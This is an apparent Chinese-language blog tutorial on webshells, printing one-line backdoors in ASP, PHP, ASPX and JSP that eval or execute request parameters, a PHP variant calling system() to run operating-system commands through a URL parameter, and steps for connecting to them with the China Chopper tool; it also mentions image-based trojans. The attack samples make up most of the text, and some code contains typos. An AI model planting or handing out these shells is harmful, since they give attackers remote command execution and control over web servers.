webshell(web后门)
一、一句话木马
短小精悍,功能强大,隐蔽性好。
<%
execute request("value")
%>
说明:
使用request的话,post和get两中方式传来的数据都可以接受。
execute用来执行客户端传来的数据。
代码本身没有危害,关键在于我们传输的数据是什么。
常见写法
asp一句话木马
<%eval request("c")%>
php一句话木马
<?php @eval($_POST[‘value’]);?>
aspx一句话木马
<%@ Page Language="Jscript"%>
<%eval(Request.ltem["value"])%>
jsp一句话木马
< % if(request.getParametere("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f")))write(request.getParameter("t").getBytes());% >
利用中国菜刀进行连接
这边我用phpstudy做演示,需要把一句话木马文件放在网站根目录。
一句话木马内容为
<?php @eval($_REQUEST['xx']);
?>
可以手动获取信息
我们把一句话木马内容改成
<?php @system($_REQUEST['xx']);
?>
这样可以执行系统命令。注意再次使用中国菜刀连接其他链接之前,需要重置下缓存。
在浏览器输入
http://localhost/123.php?xx=ipconfig
执行系统命令
图片木马的制作
上传到服务器后不能直接执行,得想办法改成脚本格式或者在特定环境下以脚本运行
一句话使用技巧
二、小马、大马
还有其他木马,如打包马、脱裤马等等